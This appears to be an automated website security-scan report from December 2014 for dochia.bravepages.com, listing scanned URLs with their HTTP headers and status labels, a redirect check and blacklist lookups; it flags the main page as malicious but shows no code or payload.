Scanned pages/files
Request | Server response | Status |
http://dochia.bravepages.com/ | 200 OK Content-Length: 11349 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://stattrack.0catch.com/python/traffserv/handler | HTTP/1.1 307 Temporary Redirect Connection: close Date: Tue, 16 Dec 2014 09:27:25 GMT Location: http://banner.0catch.com/cgi-bin/popup_mainsite.js Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 3 Content-Type: text/plain | clean |
http://banner.0catch.com/cgi-bin/popup_mainsite.js | 200 OK Content-Length: 8 Content-Type: application/x-javascript | clean |
http://stattrack.0catch.com/app/adserv/handler | HTTP/1.1 307 Temporary Redirect Connection: close Date: Tue, 16 Dec 2014 09:27:27 GMT Location: http://redvase.bravenet.com/javascripts/redvase.js Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 3 Content-Type: text/plain | clean |
http://redvase.bravenet.com/javascripts/redvase.js | 200 OK Content-Length: 8621 Content-Type: application/x-javascript | clean |
http://stattrack.0catch.com/stat.js | 200 OK Content-Length: 2620 Content-Type: application/javascript | clean |
http://exchange.bravenet.com/exit.php?id=1974761477 | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://exchange.bravenet.com//assets.bravenet.com/bn/front/js/jquery.min.js/ | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://exchange.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://exchange.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | 404 Not Found Content-Length: 16869 Content-Type: text/html | clean |
http://assets.bravenet.com/bn/js/bnui.js | 200 OK Content-Length: 44626 Content-Type: application/x-javascript | clean |
http://pub2.bravenet.com/counter/code.php?id=390456&usernum=137405393&cpv=2 | 200 OK Content-Length: 334 Content-Type: text/html | clean |
http://pub2.bravenet.com/test404page.js | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 16 Dec 2014 09:27:34 GMT Pragma: no-cache ETag: PUB2-60ac892e539bf2f837023efa1f1f713da4f49bc8-1418722054.5494 Location: http://www.bravenet.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Tue, 16 Dec 2014 09:27:24 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV" Set-Cookie: BNU=deleted; expires=Mon, 16-Dec-2013 09:27:33 GMT; path=/; domain=.bravenet.com Set-Cookie: BNP=deleted; expires=Mon, 16-Dec-2013 09:27:33 GMT; path=/; domain=.bravenet.com Set-Cookie: BNETSESSID=6pg3bk22qk9vf13nbm7kdomcc2; path=/; domain=.bravenet.com Set-Cookie: HASCOOKIES=1; expires=Fri, 13-Dec-2024 09:27:34 GMT; path=/; domain=.bravenet.com | clean |
http://www.bravenet.com/test404page.js | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/jquery.min.js/ | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bootstrap.min.js/ | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.bravenet.com//assets.bravenet.com/bn/front/js/bn.js/ | 404 Not Found Content-Length: 18189 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dochia.bravepages.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 09:27:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: visited=12%2F16%2F2014; domain=.dochia.bravepages.com; path=/; expires=Wednesday, 07-Dec-2011 12:40:25 AM GMT
Set-Cookie: visited=12%2F16%2F2014; domain=dochia.bravepages.com; path=/; expires=Wednesday, 07-Dec-2011 12:40:25 AM GMT
X-Cache: MISS from squid2.0catch.com
Second query (visit from search engine):
GET / HTTP/1.1
Host: dochia.bravepages.com
Referer: http://www.google.com/search?q=dochia.bravepages.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dochia.bravepages.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dochia.bravepages.com/
Result: dochia.bravepages.com is not infected or malware details are not published yet.